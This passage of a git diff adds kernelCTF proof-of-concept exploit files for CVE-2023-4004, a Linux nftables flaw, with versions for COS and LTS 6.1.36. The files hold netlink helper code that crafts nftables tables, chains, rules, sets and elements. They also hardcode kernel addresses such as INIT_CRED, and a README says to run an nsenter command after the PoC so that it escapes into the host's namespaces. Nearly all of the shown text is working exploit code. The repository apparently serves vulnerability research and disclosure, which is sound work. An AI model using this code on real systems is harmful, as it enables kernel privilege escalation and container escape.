nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = 
malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2;//NFPROTO_IPV4; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWRULE),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nl_msg * exprs = nlmsg_alloc(); + struct nl_msg *data_nest = nlmsg_alloc(); + struct nl_msg *expr_data = nlmsg_alloc(); + + char *a = malloc(0x100); + memset(a,0x41,0x100); + nla_put_string(expr_data, NFTA_MATCH_NAME, "set"); + nla_put_u32(expr_data, NFTA_MATCH_REV, htonl(0)); + nla_put(expr_data, NFTA_MATCH_INFO,0x100,a); + + nla_put_string(data_nest, NFTA_EXPR_NAME, "match"); + nla_put_nested(data_nest, NFTA_EXPR_DATA, expr_data); + + nla_put_nested(exprs, NFTA_LIST_ELEM, data_nest); + nla_put_string(msg2, NFTA_RULE_TABLE, table_name); + nla_put_string(msg2, NFTA_RULE_CHAIN, chain_name); + nla_put_nested(msg2, NFTA_RULE_EXPRESSIONS, exprs); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + printf("Create rule\n"); + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/set.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/set.h new file mode 100644 index 00000000..d053bed8 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/set.h @@ -0,0 +1,77 @@ +void new_set(struct nl_sock * socket, char *table_name, char *set_name, uint32_t obj_type){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWSET),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 
2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + struct nl_msg *data = nlmsg_alloc(); + struct nl_msg *data_nest = nlmsg_alloc(); + struct nl_msg *data_nest_nest = nlmsg_alloc(); + //init IPSET_ATTR_DATA + + int i=0; + + nla_put_u32(data_nest_nest, NFTA_SET_FIELD_LEN, htonl(0x10)); + for(i=0;i<2;i++){ + nla_put_nested(data_nest, NFTA_LIST_ELEM, data_nest_nest); + } + + nla_put_nested(data, NFTA_SET_DESC_CONCAT, data_nest); + //create test1 + nla_put_string(msg2, NFTA_SET_TABLE, table_name); + nla_put_string(msg2, NFTA_SET_NAME, set_name); + nla_put_u32(msg2, NFTA_SET_ID, 0x10); + nla_put_nested(msg2, NFTA_SET_DESC, data); + nla_put_u32(msg2, NFTA_SET_KEY_LEN, htonl(0x40)); + nla_put_u32(msg2, NFTA_SET_FLAGS, htonl(NFT_SET_INTERVAL|NFT_SET_OBJECT|NFT_SET_CONCAT)); + nla_put_u32(msg2, NFTA_SET_OBJ_TYPE, htonl(obj_type)); + //int res = nl_send_auto(socket, msg); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create set\n"); + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/setelem.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/setelem.h new file mode 100644 index 00000000..6e8a2a28 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/setelem.h @@ -0,0 +1,212 @@ +#define OBJ_FOR_REF "obj-for-ref" +#define ELEM_KEY_END "test-elem-key-end" +void new_setelem(struct nl_sock * socket,char *table_name, char *set_name, void *udata, uint32_t ulen){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWSETELEM),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq 
number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *elem = nlmsg_alloc(); + struct nl_msg *elem_nest = nlmsg_alloc(); + struct nl_msg *elem_key = nlmsg_alloc(); + struct nl_msg *elem_end = nlmsg_alloc(); + char *key = malloc(0x40); + char *key_end = malloc(0x40); + memset(key,0xff,0x40); + memset(key_end,0xff,0x40); + nla_put(elem_key, NFTA_DATA_VALUE, 0x40, key); + nla_put_nested(elem_nest, NFTA_SET_ELEM_KEY, elem_key); + nla_put_string(elem_nest, NFTA_SET_ELEM_OBJREF, OBJ_FOR_REF); + //nla_put_u32(elem_nest, NFTA_SET_ELEM_FLAGS, htonl(NFT_SET_ELEM_CATCHALL)); + if(udata>0){ + nla_put(elem_nest, NFTA_SET_ELEM_USERDATA, ulen, udata); + } + + nla_put_nested(elem, 1, elem_nest); + + nla_put_string(msg2, NFTA_SET_ELEM_LIST_TABLE, table_name); + nla_put_string(msg2, NFTA_SET_ELEM_LIST_SET, set_name); + nla_put_nested(msg2, NFTA_SET_ELEM_LIST_ELEMENTS, elem); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create setelem\n"); + } +} + + +void del_setelem(struct nl_sock * socket){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELSETELEM),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *elem = nlmsg_alloc(); + struct nl_msg *elem_nest = nlmsg_alloc(); + struct nl_msg *elem_key = nlmsg_alloc(); + char *key = malloc(0x40); + memset(key,0x41,0x40); + nla_put(elem_key, NFTA_DATA_VALUE, 0x40, key); + nla_put_nested(elem_nest, NFTA_SET_ELEM_KEY, elem_key); + //nla_put_string(elem_nest, NFTA_SET_ELEM_OBJREF, "test-obj2"); + + nla_put_nested(elem, 1, elem_nest); + + nla_put_string(msg2, NFTA_SET_ELEM_LIST_TABLE, "test_table"); + nla_put_string(msg2, NFTA_SET_ELEM_LIST_SET, "test_set"); + nla_put_nested(msg2, NFTA_SET_ELEM_LIST_ELEMENTS, elem); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + 
NLMSG_ALIGN(hdr2->nlmsg_len)*2 + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len), hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len), hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len)*2, hdr3, NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + printf("Delete setelem\n"); + } +} + +void elem_flush(struct nl_sock * socket, char *table_name, char *set_name){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELSETELEM),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + nla_put_string(msg2, NFTA_SET_ELEM_LIST_TABLE, table_name); + nla_put_string(msg2, NFTA_SET_ELEM_LIST_SET, set_name); + + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Flush set\n"); + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/spec.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/spec.h new file mode 100644 index 00000000..6e71e8aa --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/spec.h @@ -0,0 +1,2 @@ +#define INIT_CRED 0xFFFFFFFF83262120 +#define MODULE_CT_EXPECT_OBJ_TYPE_ADDR 0xFFFFFFFF83516840 diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/table.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/table.h new file mode 100644 index 00000000..a623f956 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/cos-105-17412.101.17/table.h 
@@ -0,0 +1,197 @@ +void new_table(struct nl_sock * socket, char *name){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2;//NFPROTO_IPV4; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWTABLE),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + nla_put_string(msg2, NFTA_TABLE_NAME, name); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create table\n"); + } +} + +void new_table_with_udata(struct nl_sock * socket, char *name,char *udata, int len){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2;//NFPROTO_IPV4; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWTABLE),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + nla_put_string(msg2, NFTA_TABLE_NAME, name); + nla_put(msg2,NFTA_TABLE_USERDATA,len,udata); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) 
+ NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create table\n"); + } +} + +void get_table(struct nl_sock * socket, char *name){ + //init msg + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + nfnlmsg_put( + msg, + NL_AUTO_PID, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_SUBSYS_NFTABLES, //SUBSYS + NFT_MSG_GETTABLE, // TYPE + NLM_F_REQUEST, //NLM_F_ECHO + 2, //FAMILY + 0 //RES_ID + ); + //init msg + nla_put_string(msg, NFTA_TABLE_NAME, name); + + int res = nl_send_auto(socket, msg); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Get table %s\n",name); + } +} +void del_table(struct nl_sock * socket, char *table_name){ + + struct nl_msg * msg = nlmsg_alloc(); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELTABLE),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + + nla_put_string(msg2, NFTA_TABLE_NAME, table_name); + + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Delete object %s\n",obj_name); + } + +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/Makefile b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/Makefile new file mode 100644 index 00000000..e2a6e2ce --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/Makefile @@ -0,0 +1,9 @@ +exploit: + gcc -o exploit exploit.c -I/usr/include/libnl3 -lnl-nf-3 -lnl-route-3 -lnl-3 -static +prerequisites: + 
sudo apt-get install libnl-nf-3-dev +run: + ./exploit + +clean: + rm exploit diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/README b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/README new file mode 100644 index 00000000..eada68f2 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/README @@ -0,0 +1,2 @@ +Exploit for kctf LTS 6.1.36 +Run command "nsenter --target 1 -m -p" after run the poc. diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/chain.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/chain.h new file mode 100644 index 00000000..4245eb47 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/lts-6.1.36/chain.h @@ -0,0 +1,56 @@ +void new_chain(struct nl_sock * socket, char *table_name, char *chain_name){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2;//NFPROTO_IPV4; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWCHAIN),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + nla_put_string(msg2, NFTA_CHAIN_TABLE, table_name); + nla_put_string(msg2, NFTA_CHAIN_NAME, chain_name); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + 